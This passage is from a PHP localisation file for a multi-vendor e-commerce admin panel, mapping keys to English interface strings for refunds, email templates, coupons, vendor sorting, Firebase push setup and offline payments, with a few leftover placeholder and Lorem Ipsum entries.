'thank_you_for_joining' => 'Thank you for joining', 'if_you_want_to_become_a_registered_customer_then_reset_your_password_below_by_using_this_' => 'If you want to become a registered customer then reset your password below by using this ', 'then_you’ll_be_able_to_explore_the_website_and_app_as_a_registered_customer' => 'Then you’ll be able to explore the website and app as a registered customer', 'reset_Password' => 'Reset Password', 'meanwhile_click_here_to_visit_' => 'Meanwhile click here to visit ', 'please_' => 'Please ', '_contact_us' => ' contact us', '_for_any_queries' => ' for any queries', 'customer_added_successfully' => 'Customer added successfully', 'invoice_Settings' => 'Invoice Settings', 'invoice_settings' => 'Invoice settings', 'Terms_&_Condition' => 'Terms & Condition', 'Business identity' => 'Business identity', 'tax_Id' => 'Tax Id', 'bin_Number' => 'Bin Number', 'musak' => 'Musak', 'enter' => 'Enter', 'invoice_logo' => 'Invoice logo', 'invoice_settings_update_successfully' => 'Invoice settings update successfully', 'want_to_Turn_ON_Employee_Status' => 'Want to Turn ON Employee Status', 'role_not_found' => 'Role not found', 'employee_role_setup' => 'Employee role setup', 'select_all' => 'Select all', 'system_settings' => 'System settings', 'employee_Role_List' => 'Employee Role List', 'role_Name' => 'Role Name', 'Modules' => 'Modules', 'created_At' => 'Created At', 'employee_Role_Analytics' => 'Employee Role Analytics', 'active_Employee_Role' => 'Active Employee Role', 'inactive_Employee_Role' => 'Inactive Employee Role', 'use_this_product_info' => 'Use this product info', 'create_a_unique_product_code_by_clicking_on_the_Generate_Code_button' => 'Create a unique product code by clicking on the Generate Code button', 'reference_ID' => 'Reference ID', 'please_rate_the_quality' => 'Please rate the quality', 'The_comment_is_required' => 'The comment is required', 'there_is_no_vendor' => 'There is no vendor', 'credentials_doesnt_match' => 'Credentials doesnt match', 'there_is_no_Brand' => 'There is no Brand', 'my_Compare_List' => 'My Compare List', 'want_to_clear_all_compare_list' => 'Want to clear all compare list', 'You_have_not_added_product_to_compare_yet' => 'You have not added product to compare yet', 'want_to_clear_all_wishlist' => 'Want to clear all wishlist', 'You_have_not_added_product_to_wishlist_yet' => 'You have not added product to wishlist yet', 'There_is_no_product' => 'There is no product', 'You_have_not_any_order_yet' => 'You have not any order yet', 'my_Loyalty_Point' => 'My Loyalty Point', 'total_points' => 'Total points', 'all_transactions' => 'All transactions', 'all_transaction' => 'All transaction', 'order_Place' => 'Order Place', 'point_To_wallet' => 'Point To wallet', 'minimum_point_for_convert_to_currency_is' => 'Minimum point for convert to currency is', 'you_don’t_have_any' => 'You don’t have any', 'No_message_found' => 'No message found', 'No_ticket_created_yet' => 'No ticket created yet', 'No_coupon_available' => 'No coupon available', 'No_address_found' => 'No address found', 'No_review_yet' => 'No review yet', 'shipping_Not_Available_for' => 'Shipping Not Available for', 'Congratulations' => 'Congratulations', 'thank_you_for_choosing_' => 'Thank you for choosing ', 'your_digital_product_is_ready_for_download' => 'Your digital product is ready for download', 'to_download_your_product' => 'To download your product', '_use_your_email_' => ' use your email ', '_and' => ' and', '_order' => ' order', '_below' => ' below', 'to_verify_when_download_your_product' => 'To verify when download your product', '_use_your_order_info' => ' use your order info', 'click_below' => 'Click below', 'don’t_share_your_order_information' => 'Don’t share your order information', '_it’s_confidential' => ' it’s confidential', '_if_you_share_this_info' => ' if you share this info', '_then_anyone_can_download' => ' then anyone can download', 'you_can_only_delivery_in_added_zip_code_areas_that_has_already_selected_by_admin' => 'You can only delivery in added zip code areas that has already selected by admin', 'you_can_only_deliver_orders_to_the_selected_countries_which_admin_selected' => 'You can only deliver orders to the selected countries which admin selected', 'Halar' => 'Halar', 'approved_products' => 'Approved products', 'vendor_apply' => 'Vendor apply', 'open_your_shop_and_start_selling' => 'Open your shop and start selling', 'image_size_must_be_within_2_MB' => 'Image size must be within 2 MB', 'image_type_must_be_within_.jpg .png .jpeg .gif' => 'Image type must be within .jpg .png .jpeg .gif', 'environment_variables_updated_successfully' => 'Environment variables updated successfully', 'To_order_digital_product' => 'To order digital product', '_kindly_fill_up_the_“Add_New_Customer”_form' => ' kindly fill up the “Add New Customer” form', 'joined_date' => 'Joined date', 'want_to_refund_this_refund_request' => 'Want to refund this refund request', 'hgfdsa' => 'Hgfdsa', 'want_to_approv_this_refund_request' => 'Want to approv this refund request', 'please_write_the_approve_reason' => 'Please write the approve reason', 'then_you_can’t_change_this_status' => 'Then you can’t change this status', 'without_a_proper_payment_info you_cannot_change_the_Refund_Status' => 'Without a proper payment info you cannot change the Refund Status', 'please_enter_the_payment_information_according_to_your_chosen_payment_method' => 'Please enter the payment information according to your chosen payment method', 'then_you_won’t_able_change_any_status' => 'Then you won’t able change any status', 'once_you_refund_that_refund_request' => 'Once you refund that refund request', 'order_volume(high_to_low)' => 'Order volume(high to low)', 'order_volume(low_to_high)' => 'Order volume(low to high)', 'inventory_quantity(high_to_low)' => 'Inventory quantity(high to low)', 'inventory_quantity(low_to_high)' => 'Inventory quantity(low to high)', 'generate_Barcode' => 'Generate Barcode', 535 => '535', 'order_Report_Statement' => 'Order Report Statement', 'total_Ordered_Amount' => 'Total Ordered Amount', 'total_Shipping_Charge' => 'Total Shipping Charge', 'total_Order_Commission' => 'Total Order Commission', 'total_Deliveryman_Incentive' => 'Total Deliveryman Incentive', 'search_by_payment_method_name' => 'Search by payment method name', 'You_have_not_added_anything_to_your_cart_yet' => 'You have not added anything to your cart yet', 'language_name' => 'Language name', 'showing' => 'Showing', 'Loading' => 'Loading', 'delivery_man_added_successfully' => 'Delivery man added successfully', 'let_us_shopping_today' => 'Let us shopping today', 'request_Time' => 'Request Time', 'total_Withdraw_Request' => 'Total Withdraw Request', 'notify_all_the_vendors' => 'Notify all the vendors', 'no_employee_found' => 'No employee found', 'employee Add' => 'Employee Add', 'add_new_employee' => 'Add new employee', 'John_Doe' => 'John Doe', 'identify_type' => 'Identify type', 'select_identify_type' => 'Select identify type', 'NID' => 'NID', 'identify_number' => 'Identify number', 'Attribute1' => 'Attribute1', 'Attribute2' => 'Attribute2', 'Attribute3' => 'Attribute3', 'The password and con password must match.' => 'The password and con password must match.', 'registration_successful' => 'Registration successful', 'no_withdraw_request_found' => 'No withdraw request found', 'denied_Request' => 'Denied Request', 'approved_Request' => 'Approved Request', 'total__Request' => 'Total Request', 'withdraw_Request_Analytics' => 'Withdraw Request Analytics', 'delivery_Man_Withdraw_Request_List' => 'Delivery Man Withdraw Request List', 'Already_have_account ' => 'Already have account ', 'Maintenance_is_on' => 'Maintenance is on', 'Maintenance_is_off' => 'Maintenance is off', 'you_can_not_update_this_on_demo_mode' => 'You can not update this on demo mode', 'header_content' => 'Header content', 'main_title' => 'Main title', 'mail_body' => 'Mail body', 'product_information' => 'Product information', 'Product Information will be automatically bind from database' => 'Product Information will be automatically bind from database', 'If you don’t want to see the information in the mail' => 'If you don’t want to see the information in the mail', 'just turn the switch button off' => 'Just turn the switch button off', 'button_content' => 'Button content', 'button_name' => 'Button name', 'redirect_link' => 'Redirect link', 'order_information' => 'Order information', 'order_Information_will_be_automatically_bind_from_database' => 'Order Information will be automatically bind from database', 'if_you don’t_want_to see_the_information_in_the_mail' => 'If you don’t want to see the information in the mail', 'just_turn_the_switch_button_off' => 'Just turn the switch button off', 'footer_content' => 'Footer content', 'section_text' => 'Section text', 'page_links' => 'Page links', 'social_media_links' => 'Social media links', 'copyright_content' => 'Copyright content', 'all_right_reserved' => 'All right reserved', 'get_email_on' => 'Get email on', 'get_email_on_' => 'Get email on ', 'want_to_Turn_OFF_this_mail' => 'Want to Turn OFF this mail', 'want_to_Turn_ON_this_mail' => 'Want to Turn ON this mail', 'if_disabled_users_would_not_receive_this_mail' => 'If disabled users would not receive this mail', 'if_enabled_users_will_receive_this_mail' => 'If enabled users will receive this mail', 'template_UI' => 'Template UI', 'product_information_will_be_automatically_bind_from_database' => 'Product information will be automatically bind from database', 'If_you_don’t_want_to_see_the_information_in_the_mail' => 'If you don’t want to see the information in the mail', 'we’re_always_happy_to_help' => 'We’re always happy to help', 'social_media_deleted_successfully' => 'Social media deleted successfully', 'social_Media_inserted_Successfully' => 'Social Media inserted Successfully', 'Time & Date' => 'Time & Date', 'please_ensure_your_code_does_not_exceed_20_characters' => 'Please ensure your code does not exceed 20 characters', 'code_with_a_minimum_length_requirement_of_6_characters' => 'Code with a minimum length requirement of 6 characters', '+' => '+', 'announcement_updated_successfully' => 'Announcement updated successfully', 'push_notification_setup' => 'Push notification setup', 'firebase_configuration' => 'Firebase configuration', 'for_Vendor' => 'For Vendor', 'customer_block_message' => 'Customer block message', 'customer_unblock_message' => 'Customer unblock message', 'product_request_approved_message' => 'Product request approved message', 'product_request_rejected_message' => 'Product request rejected message', 'go_to_Firebase_Console' => 'Go to Firebase Console', 'open_your_web_browser_an_ go_to_the_Firebase_Console' => 'Open your web browser an go to the Firebase Console', '(' => '(', 'https://console.firebase.google.com/' => 'Https://console.firebase.google.com/', ').' => ').', 'select_the_project_for_which_you_want_to_configure_FCM_from_the_Firebase_Console_dashboard' => 'Select the project for which you want to configure FCM from the Firebase Console dashboard', 'navigate_to_project_settings' => 'Navigate to project settings', 'in_the_left-hand_menu _click_on_the' => 'In the left-hand menu click on the', 'gear_icon _and_then_select' => 'Gear icon and then select', 'from_the_dropdown' => 'From the dropdown', 'in_the_Project_settings_page _click_on_the' => 'In the Project settings page click on the', 'Cloud_Messaging' => 'Cloud Messaging', 'tab_from_the_top_menu' => 'Tab from the top menu', 'obtain_all_the_information_asked' => 'Obtain all the information asked', 'In_the_Firebase_Project_settings_page _click_on_the_ General _tab_from_the_top_menu' => 'In the Firebase Project settings page click on the General tab from the top menu', 'under_the' => 'Under the', 'Your_Apps' => 'Your Apps', 'section' => 'Section', 'WEB' => 'WEB', 'app_for_which_you_want_to_configure_FCM' => 'App for which you want to configure FCM', 'then_obtain' => 'Then obtain', 'API_Key' => 'API Key', 'Auth_Domain' => 'Auth Domain', 'Storage_Bucket' => 'Storage Bucket', 'Messaging_Sender_ID' => 'Messaging Sender ID', 'please_make_sure_to_use_the_obtained_information_securely_and_in_accordance_with_Firebase_and_FCM_documentation _terms_of_service _and_any_applicable_laws_and_regulations' => 'Please make sure to use the obtained information securely and in accordance with Firebase and FCM documentation terms of service and any applicable laws and regulations', 'change_password_request' => 'Change password request', 'copyright_' => 'Copyright ', 'want_to_Turn_ON_the_smtp_mail_config_option' => 'Want to Turn ON the smtp mail config option', 'enabling_mail_configuration_services_will_allow_the_system_to_send_emails' => 'Enabling mail configuration services will allow the system to send emails', 'please_ensure_that_you_have_correctly_configured_the_SMTP_settings_to_avoid_potential_issues_with_email_delivery' => 'Please ensure that you have correctly configured the SMTP settings to avoid potential issues with email delivery', 'want_to_Turn_ON_the_sendgrid_mail_config_option' => 'Want to Turn ON the sendgrid mail config option', 'please_ensure_that_you_have_correctly_configured_the_sendgrid_settings_to_avoid_potential_issues_with_email_delivery' => 'Please ensure that you have correctly configured the sendgrid settings to avoid potential issues with email delivery', 'the_name_field_is_required!' => 'The name field is required!', 'the_host_field_is_required!' => 'The host field is required!', 'the_driver_field_is_required!' => 'The driver field is required!', 'the_port_field_is_required!' => 'The port field is required!', 'the_username_field_is_required!' => 'The username field is required!', 'the_email_field_is_required!' => 'The email field is required!', 'the_encryption_field_is_required!' => 'The encryption field is required!', 'the_password_field_is_required!' => 'The password field is required!', 'refund_Order_List' => 'Refund Order List', 'refund_Status' => 'Refund Status', 'total pending refund_Requests' => 'Total pending refund Requests', 'filter_By' => 'Filter By', 'product_Information' => 'Product Information', 'product_Amount' => 'Product Amount', 'Refund_Amount' => 'Refund Amount', 'store_Name' => 'Store Name', 'delivery_Name' => 'Delivery Name', 'refund_Reason' => 'Refund Reason', 'hwj hwo qoyw vsh w skow wh' => 'Hwj hwo qoyw vsh w skow wh', 'asdf' => 'Asdf', 'total refunded refund_Requests' => 'Total refunded refund Requests', 'There are many variations of passages of Lorem Ipsum available but the majority have suffered alteration in some form by injected humour or randomised words which don t look even slightly believable.' => 'There are many variations of passages of Lorem Ipsum available but the majority have suffered alteration in some form by injected humour or randomised words which don t look even slightly believable.', 'rejected_refund_Requests' => 'Rejected refund Requests', 'total rejected refund_Requests' => 'Total rejected refund Requests', 'It is a long established fact that a reader will be distracted by the readable content of a page when looking at its layout. The point of using Lorem Ipsum is that it has a more-or-less normal distribution of letters as opposed to using Content here content here making it look like readable English. Many desktop publishing packages and web page editors now use Lorem Ipsum as their default model text and a search for lorem ipsum will uncover many web sites still in their infancy. Various versions have evolved over the years sometimes by accident sometimes on purpose (injected humour and the like).' => 'It is a long established fact that a reader will be distracted by the readable content of a page when looking at its layout. The point of using Lorem Ipsum is that it has a more-or-less normal distribution of letters as opposed to using Content here content here making it look like readable English. Many desktop publishing packages and web page editors now use Lorem Ipsum as their default model text and a search for lorem ipsum will uncover many web sites still in their infancy. Various versions have evolved over the years sometimes by accident sometimes on purpose (injected humour and the like).', 'Lorem Ipsum is simply dummy text of the printing and typesetting industry. Lorem Ipsum has been the industry s standard dummy text ever since the 1500s when an unknown printer took a galley of type and scrambled it to make a type specimen book. It has survived not only five centuries but also the leap into electronic typesetting remaining essentially unchanged.' => 'Lorem Ipsum is simply dummy text of the printing and typesetting industry. Lorem Ipsum has been the industry s standard dummy text ever since the 1500s when an unknown printer took a galley of type and scrambled it to make a type specimen book. It has survived not only five centuries but also the leap into electronic typesetting remaining essentially unchanged.', 'product quality is not good' => 'Product quality is not good', 'product quality is not good. product quality is not good. product quality is not good.' => 'Product quality is not good. product quality is not good. product quality is not good.', 'all_Customers' => 'All Customers', 'item_Price' => 'Item Price', 'or_some_coupons_are_for_all_vendors' => 'Or some coupons are for all vendors', 'feature_deal_table' => 'Feature deal table', 'coupon_List' => 'Coupon List', 'coupon_Title' => 'Coupon Title', 'coupon_Code' => 'Coupon Code', 'coupon_Type' => 'Coupon Type', 'number_of_Uses' => 'Number of Uses', 'limit_for_Same_User' => 'Limit for Same User', 'min_Purchase_Amount' => 'Min Purchase Amount', 'max_discount_Amount' => 'Max discount Amount', 'coupon_Bearer' => 'Coupon Bearer', 'discount_on_purchase' => 'Discount on purchase', 'first_order' => 'First order', 'want_to_Turn_ON_Coupon_Status' => 'Want to Turn ON Coupon Status', 'want_to_Turn_OFF_Coupon_Status' => 'Want to Turn OFF Coupon Status', 'in_House_Orders' => 'In House Orders', 'in_House_Products' => 'In House Products', 'order_Transaction_Report_List' => 'Order Transaction Report List', 'vendor_Net_income' => 'Vendor Net income', 'expanse_Transaction_Report_List' => 'Expanse Transaction Report List', 'product_Report_List' => 'Product Report List', 'total_Amount Sold' => 'Total Amount Sold', 'product_Stock_Report_List' => 'Product Stock Report List', 'stock_Sort_By' => 'Stock Sort By', 'low_to_high' => 'Low to high', 'current_Stock ' => 'Current Stock ', 'order_Report_List' => 'Order Report List', 'vendor_Withdraw_Request' => 'Vendor Withdraw Request', 'vendor_Withdraw_Analytics' => 'Vendor Withdraw Analytics', 'total_Pending' => 'Total Pending', 'total_Approved' => 'Total Approved', 'total_Denied' => 'Total Denied', 'back_to_delivery-man_list' => 'Back to delivery-man list', 'collect_cash' => 'Collect cash', 'delivery_man_account' => 'Delivery man account', 'Failed_To_Deliver' => 'Failed To Deliver', 'earning_history' => 'Earning history', '_contact_info' => ' contact info', 'delivery_Man_List' => 'Delivery Man List', 'delivery_Man_Analytics' => 'Delivery Man Analytics', 'total_Delivery_Man' => 'Total Delivery Man', 'active_Delivery_Man' => 'Active Delivery Man', 'inactive_Delivery_man' => 'Inactive Delivery man', 'delivery_Man_Image' => 'Delivery Man Image', 'all_product_List' => 'All product List', 'pending_products' => 'Pending products', 'pending_for_approval_products' => 'Pending for approval products', 'new-request_product_List' => 'New-request product List', 'time_&_Date' => 'Time & Date', 'Temporary_OFF' => 'Temporary OFF', 'email_template' => 'Email template', 'don’t_show_again' => 'Don’t show again', 'click_to_view' => 'Click to view', 'there_isn’t_enough_quantity_on_stock' => 'There isn’t enough quantity on stock', 'please_check_products_in_limited_stock' => 'Please check products in limited stock', '_more_products_have_low_stock' => ' more products have low stock', 'this_product_is_low_on_stock' => 'This product is low on stock', 'priority_setup' => 'Priority setup', 'brands_are_lists_of_the_specific_products' => 'Brands are lists of the specific products', '_organize_by_putting_the_newest_ones_at_the_top_and_arranging_everything_alphabetically' => ' organize by putting the newest ones at the top and arranging everything alphabetically', 'use_default_sorting_list' => 'Use default sorting list', 'currently_sorting_this_section_based_on_latest_add' => 'Currently sorting this section based on latest add', 'use_custom_sorting_list' => 'Use custom sorting list', 'you_can_sorting_this_section_by_others_way' => 'You can sorting this section by others way', 'sort_by_latest_created' => 'Sort by latest created', 'sort_by_first_created' => 'Sort by first created', 'sort_by_most_order' => 'Sort by most order', 'sort_by_Alphabetical' => 'Sort by Alphabetical', 'the_category_list_groups_similar_products_together_arranged_with_the_latest_category_first_and_in_alphabetical_order' => 'The category list groups similar products together arranged with the latest category first and in alphabetical order', 'currently_sorting_this_section_based_on_priority_wise' => 'Currently sorting this section based on priority wise', 'vendor_list' => 'Vendor list', 'the_Vendor_list_arranges_all_vendors_based_on_the_latest_join_that_are_highly_rated_by_customer_choice_and_also_in_alphabetic_order' => 'The Vendor list arranges all vendors based on the latest join that are highly rated by customer choice and also in alphabetic order', 'currently_sorting_this_section_based_on_first_created' => 'Currently sorting this section based on first created', 'sort_by_reviews_count' => 'Sort by reviews count', 'sort_by_ratings' => 'Sort by ratings', 'show_currently_closed_stores_in_the_last' => 'Show currently closed stores in the last', 'remove_currently_closed_stores_from_the_list' => 'Remove currently closed stores from the list', 'none' => 'None', 'show_temporarily_off_stores_in_the_last' => 'Show temporarily off stores in the last', 'remove_temporarily_off_stores_from_the_list' => 'Remove temporarily off stores from the list', 'the_featured_product_means_the_product_list_which_are_mostly_ordered' => 'The featured product means the product list which are mostly ordered', '_customers_choice_and_have_good_reviews_&_ratings' => ' customers choice and have good reviews & ratings', 'show_stock_out_products_in_the_last' => 'Show stock out products in the last', 'remove_stock_out_products_from_the_list' => 'Remove stock out products from the list', 'show_product_in_the_last_if_store_is_temporarily_off' => 'Show product in the last if store is temporarily off', 'remove_product_from_the_list_if_store_is_temporarily_off' => 'Remove product from the list if store is temporarily off', 'top_vendor' => 'Top vendor', 'top_vendor_list_refers_to_displaying_a_list_based_on_most_ordered_items_of_that_vendor_and_highly_rated' => 'Top vendor list refers to displaying a list based on most ordered items of that vendor and highly rated', 'show_4+_rated_sellers' => 'Show 4+ rated sellers', 'show_3.5+_rated_sellers' => 'Show 3.5+ rated sellers', 'show_2+_rated_sellers' => 'Show 2+ rated sellers', 'sort_by_order' => 'Sort by order', 'Category_wise_product_list' => 'Category wise product list', 'category_or_subcategory_wise_product_list_is_for_displaying_the_products_which_are_mostly_ordered' => 'Category or subcategory wise product list is for displaying the products which are mostly ordered', 'currently_sorting_this_section_based_on_orders' => 'Currently sorting this section based on orders', 'top_rated_products_are_the_mostly_ordered_product_list_of_customer_choice_which_are_highly_rated_&_reviewed' => 'Top rated products are the mostly ordered product list of customer choice which are highly rated & reviewed', 'currently_sorting_this_section_based_on_review_count' => 'Currently sorting this section based on review count', 'show_4+_rated_products' => 'Show 4+ rated products', 'show_3.5+_rated_products' => 'Show 3.5+ rated products', 'show_3+_rated_products' => 'Show 3+ rated products', 'best_selling_products' => 'Best selling products', 'best_selling_products_are_those_items_that_are_purchased_by_customers_mostly_compared_to_other_products_within_a_specific_period' => 'Best selling products are those items that are purchased by customers mostly compared to other products within a specific period', 'currently_sorting_this_section_based_on_order_count' => 'Currently sorting this section based on order count', 'products_list' => 'Products list', 'Search_Bar' => 'Search Bar', 'the_product_list_(Search_Bar)_is_the_list_of_those_products_which_appear_during_search_based_on_product_availability' => 'The product list (Search Bar) is the list of those products which appear during search based on product availability', 'currently_sorting_this_section_by_keyword_wise' => 'Currently sorting this section by keyword wise', 'show_product_in_the_last_is_store_is_temporarily_off' => 'Show product in the last is store is temporarily off', 'vendor_product_list' => 'Vendor product list', 'the_vendor_product_list_is_for_displaying_the_products_which_are_mostly_ordered' => 'The vendor product list is for displaying the products which are mostly ordered', '_have_good_reviews_&_sorted_alphabetically' => ' have good reviews & sorted alphabetically', 'featured_product_priority_setup_updated_successfully' => 'Featured product priority setup updated successfully', 'otp_verified_successfully' => 'Otp verified successfully', 'add_to_compare_list' => 'Add to compare list', 'closed_Now' => 'Closed Now', 'vendor_product_list_priority_setup_updated_successfully' => 'Vendor product list priority setup updated successfully', 'vendor_list_priority_setup_updated_successfully' => 'Vendor list priority setup updated successfully', 'top_vendor_list_priority_setup_updated_successfully' => 'Top vendor list priority setup updated successfully', 'top_Stores' => 'Top Stores', 'enter_sub_title' => 'Enter sub title', 'sub_title' => 'Sub title', 'enter_title' => 'Enter title', 'header' => 'Header', 'why_Sell_With_Us' => 'Why Sell With Us', 'business_Process' => 'Business Process', 'download_App' => 'Download App', 'header_section' => 'Header section', 'create_an_account' => 'Create an account', 'Ex: example@gmail.com' => 'Ex: example@gmail.com', 'Frequently Asked Questions' => 'Frequently Asked Questions', 'got_questions_about_becoming_a_vendor' => 'Got questions about becoming a vendor', 'explore_our_vendor_FAQ_section_for_answers_to_any_queries_you_may_have_about_joining_our_platform_as_a_vendor' => 'Explore our vendor FAQ section for answers to any queries you may have about joining our platform as a vendor', 'Ex: XYZ store' => 'Ex: XYZ store', 'Image Size : Max 2 MB' => 'Image Size : Max 2 MB', 'please_enter_your_email' => 'Please enter your email', 'please_enter_a_valid_email_address' => 'Please enter a valid email address', 'please_enter_your_password' => 'Please enter your password', 'please_enter_your_confirm_password' => 'Please enter your confirm password', 'write_description' => 'Write description', 'why_sell_with_Us' => 'Why sell with Us', 'vendor_Registration' => 'Vendor Registration', 'The last name field is required' => 'The last name field is required', 'add_dynamic_url_to_secure_admin_login_access' => 'Add dynamic url to secure admin login access', 'facebook_API_set_up_instructions' => 'Facebook API set up instructions', 'offline_Payment_allows_customers_to_use_external_payment_methods._They_must_share_payment_details_with_the_vendor_afterward._Admin_can_set_whether_customers_can_make_offline_payments_by_enabling/disabling_this_button. ' => 'Offline Payment allows customers to use external payment methods. They must share payment details with the vendor afterward. Admin can set whether customers can make offline payments by enabling/disabling this button. ', 'if_disabled_the_Cash_on_Delivery_payment_method_will_be_hidden_from_the_checkout_page' => 'If disabled the Cash on Delivery payment method will be hidden from the checkout page', 'product_setup' => 'Product setup', 're-order_level' => 'Re-order level', 'vendors_can_see_all_products_that_need_to_be_re_stocked_in_a_section_when_they_reach_this_ReOrder_Level' => 'Vendors can see all products that need to be re stocked in a section when they reach this ReOrder Level', 'sell_digital_product' => 'Sell digital product', 'if_enabled_vendors_can_sell_digital_products' => 'If enabled vendors can sell digital products', 'if_enabled_vendors_can_sell_digital_products_in_their_shops' => 'If enabled vendors can sell digital products in their shops', 'sort_by_average_ratings' => 'Sort by average ratings', 'show_billing_address_in_checkout' => 'Show billing address in checkout', 'the_commission_value_field_must_be_at_least_min' => 'The commission value field must be at least min', 'The_minimum_transfer_point_must_be_at_least_0' => 'The minimum transfer point must be at least 0', 'The_minimum_transfer_point_must_be_a_numeric_value' => 'The minimum transfer point must be a numeric value', 'The_item_purchase_point_must_be_at_least_0' => 'The item purchase point must be at least 0', 'The_item_purchase_point_must_be_a_numeric_value' => 'The item purchase point must be a numeric value', 'If_only_the ‘Delivery_Available_Country’ feature_is_enabled _and_you_add_your_preferred_country _then_you’ll_be_able_to_deliver_all_over_the_country' => 'If only the ‘Delivery Available Country’ feature is enabled and you add your preferred country then you’ll be able to deliver all over the country', 'admin_mail_template' => 'Admin mail template', 'vendor_mail_template' => 'Vendor mail template', 'customer_mail_template' => 'Customer mail template', 'delivery_Man_mail_template' => 'Delivery Man mail template', 'order_received' => 'Order received', 'order_Summary' => 'Order Summary', 'The school of life - emotional baggage tote bag - canvas tote bag (navy) x 1' => 'The school of life - emotional baggage tote bag - canvas tote bag (navy) x 1', 'vat/Tax' => 'Vat/Tax', 'input_a_title' => 'Input a title', 'give_email_template_a_descriptive_title_that_will_help_users_identify_what_it_for' => 'Give email template a descriptive title that will help users identify what it for', 'write_a_message_in_the_email_body' => 'Write a message in the email body', 'you_can_add_your_message_using_placeholders_to_include_dynamic_content' => 'You can add your message using placeholders to include dynamic content', 'here_are_some_examples_of_placeholders_you_can_use' => 'Here are some examples of placeholders you can use', 'the_name_of_the_user' => 'The name of the user', 'the_name_of_the_admin' => 'The name of the admin', 'the_name_of_the_store' => 'The name of the store', 'the_name_of_the_vendor' => 'The name of the vendor', 'the_order_id' => 'The order id', 'the_transaction_id' => 'The transaction id', 'the_email_id' => 'The email id', 'add_button_&_link' => 'Add button & link', 'specify_the_text_and_URL_for_the_button_that_you_want_to_include_in_your_email' => 'Specify the text and URL for the button that you want to include in your email', 'choose_a_icon_/_banner_image' => 'Choose a icon / banner image', 'select_a_background_image_to_display_behind_your_email_content' => 'Select a background image to display behind your email content', 'select_footer_content' => 'Select footer content', 'add_footer_content' => 'Add footer content', '_such_as_your_company_address_and_contact_information' => ' such as your company address and contact information', 'create_a_copyright_notice' => 'Create a copyright notice', 'include_a_copyright_notice_at_the_bottom_of_your_email_to_protect_your_content' => 'Include a copyright notice at the bottom of your email to protect your content', 'save_and_publish' => 'Save and publish', 'once_you’ve_set_up_all_the_elements_of_your_email_template_save_and_publish_it_for_use' => 'Once you’ve set up all the elements of your email template save and publish it for use', 'choose_your_preferred_payment_method_such_as_bank _mobile_wallet _digital_cards _etc' => 'Choose your preferred payment method such as bank mobile wallet digital cards etc', 'that_customers_will_choose_from_and_add_relevant_input_fields_for_the_payment_method' => 'That customers will choose from and add relevant input fields for the payment method', 'payment_method_name' => 'Payment method name', 'input_data' => 'Input data', 'AVC_bank' => 'AVC bank', 'required_information_from_Customer' => 'Required information from Customer', 'add_relevant_input_fields_for_customers_to_fill-up_after_completing_the_offline_payment' => 'Add relevant input fields for customers to fill-up after completing the offline payment', 'you_can_add_multiple_input_fields_&_place_holders_and_define_them_as_‘Is_Required’ _so_customers_cannot_complete_offline_payment_without_adding_that_information' => 'You can add multiple input fields & place holders and define them as ‘Is Required’ so customers cannot complete offline payment without adding that information', 'create_your_custom_offline_payment_method' => 'Create your custom offline payment method', 'for_a_personalised_payment_experience' => 'For a personalised payment experience', 'how_does_offline_payment_method_work' => 'How does offline payment method work', 'step' => 'Step', 'for_more_information' => 'For more information', 'according_to_your_payment_method' => 'According to your payment method', 'Required_Information_from_Customer' => 'Required Information from Customer', 'that_you_need_to_verify_according_to_your_payment_method' => 'That you need to verify according to your payment method', 'mark_the_check_box_if_the_field_is_required' => 'Mark the check box if the field is required', 'to_save_the_changes' => 'To save the changes', 'important_note' => 'Important note', 'you_can_add_one_or_more_offline_payment_methods_for_your_customers' => 'You can add one or more offline payment methods for your customers', 'when_a_customer_chooses_the_‘Offline Payment’_during_checkout_and_chooses_their_favorite_payment_method _they_must_fill-up_all_the_required_information_to_confirm_payment' => 'When a customer chooses the ‘Offline Payment’ during checkout and chooses their favorite payment method they must fill-up all the required information to confirm payment', 'later_admin_will_review_the_offline_payment_manually_to_confirm_order_by_changing_the_Order_&_Payment_Status_from_order_details_page' => 'Later admin will review the offline payment manually to confirm order by changing the Order & Payment Status from order details page', 'to_review_offline_payment:_Go_to_Order_Details_page_ _view_Payment_Information_ _Match_the_payment_information' => 'To review offline payment: Go to Order Details page view Payment Information Match the payment information', 'the_two-in-one_benefits_of_‘Offline_Payment_Method’_Feature' => 'The two-in-one benefits of ‘Offline Payment Method’ Feature', 'get_paid_from_customers' => 'Get paid from customers', 'introduce_more_convenient_payment_methods_for_customersEnjoy' => 'Introduce more convenient payment methods for customersEnjoy', 'no_support_ticket_found' => 'No support ticket found', 'no_category_found' => 'No category found', 'category_name_is_required' => 'Category name is required', 'category_image_is_required' => 'Category image is required', 'category_priority_is_required' => 'Category priority is required', 'category_added_successfully' => 'Category added successfully', 'generate_Sitemap' => 'Generate Sitemap', 'with_us' => 'With us', 'Why_Sell_With_Us' => 'Why Sell With Us', 'reason_list' => 'Reason list', 'add_Reason' => 'Add Reason', 'why_sell_with_us' => 'Why sell with us', 'turning_status_off_will_not_show_this_reason_in_the_list' => 'Turning status off will not show this reason in the list', 'business_process' => 'Business process', 'download_app' => 'Download app', 'download_app_section' => 'Download app section', 'play_store_button' => 'Play store button', 'app_store_button' => 'App store button', 'FAQ_list' => 'FAQ list', 'search_by_question_&_answer' => 'Search by question & answer', 'enter_question' => 'Enter question', 'write_answer' => 'Write answer', 'turning_status_off_will_not_show_this_FAQ_in_the_list' => 'Turning status off will not show this FAQ in the list', 'There_is_no_brands' => 'There is no brands', 'terms_and_Condition' => 'Terms and Condition', 'there_is_no_FAQs' => 'There is no FAQs', 'Please_re-check_if_you’ve_put_all_the_data_correctly_or_contact_your_SMS_gateway_provider_for_assistance' => 'Please re-check if you’ve put all the data correctly or contact your SMS gateway provider for assistance', 'no_subscriber_found' => 'No subscriber found', 'no_attribute_found' => 'No attribute found', 'the_value_field_is_required' => 'The value field is required', 'Terms_and_Condition_Updated_successfully' => 'Terms and Condition Updated successfully', 'Privacy_policy_Updated_successfully' => 'Privacy policy Updated successfully', 'want_to_Turn_ON' => 'Want to Turn ON', 'want_to_Turn_OFF' => 'Want to Turn OFF', 'if_you_enable_this_option_refund_policy_page_will_be_shown_in_the_user_app_and_website' => 'If you enable this option refund policy page will be shown in the user app and website', 'if_you_disable_this_option_refund_policy_page_will_not_be_shown_in_the_user_app_and_website' => 'If you disable this option refund policy page will not be shown in the user app and website', 'if_you_enable_this_option_return_policy_page_will_be_shown_in_the_user_app_and_website' => 'If you enable this option return policy page will be shown in the user app and website', 'if_you_disable_this_option_return_policy_page_will_not_be_shown_in_the_user_app_and_website' => 'If you disable this option return policy page will not be shown in the user app and website', 'if_you_enable_this_option_cancellation_policy_page_will_be_shown_in_the_user_app_and_website' => 